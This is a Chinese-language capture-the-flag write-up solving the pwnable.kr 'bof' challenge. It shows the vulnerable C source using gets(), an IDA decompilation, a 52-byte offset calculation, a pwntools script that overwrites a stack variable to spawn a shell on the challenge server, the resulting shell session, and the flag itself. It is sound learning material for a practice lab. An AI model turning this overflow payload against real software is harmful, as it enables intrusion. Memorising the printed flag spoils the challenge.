0%

pwnable.kr —— bof

question#

1
2
3
4
5
6
7
Nana told me that buffer overflow is one of the most common software vulnerability. 
Is that true?

Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c

Running at : nc pwnable.kr 9000

先看下文件,然后nc上去进行数据输入

bof.c#

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}

analyse#

bof拖进IDA里看下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
unsigned int __cdecl func(int a1)
{
char s; // [esp+1Ch] [ebp-2Ch]
unsigned int v3; // [esp+3Ch] [ebp-Ch]

v3 = __readgsdword(0x14u);
puts("overflow me : ");
gets(&s);
if ( a1 == -889275714 )
system("/bin/sh");
else
puts("Nah..");
return __readgsdword(0x14u) ^ v3;
}

main函数调用func时,留出位置给key,所以让buffer溢出到key,填入0xcafebabe即可。IDA告诉我们s的位置位于ebp-2Ch处,而key的位置在ebp+8h处。中间要填上52个字节。

get flag#

写python脚本如下:

1
2
3
4
5
from pwn import *
ssh = remote("pwnable.kr",9000)
payload = "a"*52+p32(0xcafebabe)
ssh.send(payload)
ssh.interactive()

运行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ubuntu@VM-0-3-ubuntu:~$ python bof.py 
[+] Opening connection to pwnable.kr on port 9000: Done
[*] Switching to interactive mode
$ ls
bof
bof.c
flag
log
log2
super.pl
$ cat flag
daddy, I just pwned a buFFer :)
$
[*] Closed connection to pwnable.kr port 9000

flag:daddy, I just pwned a buFFer :)

坚持原创技术分享,您的支持将鼓励我继续创作!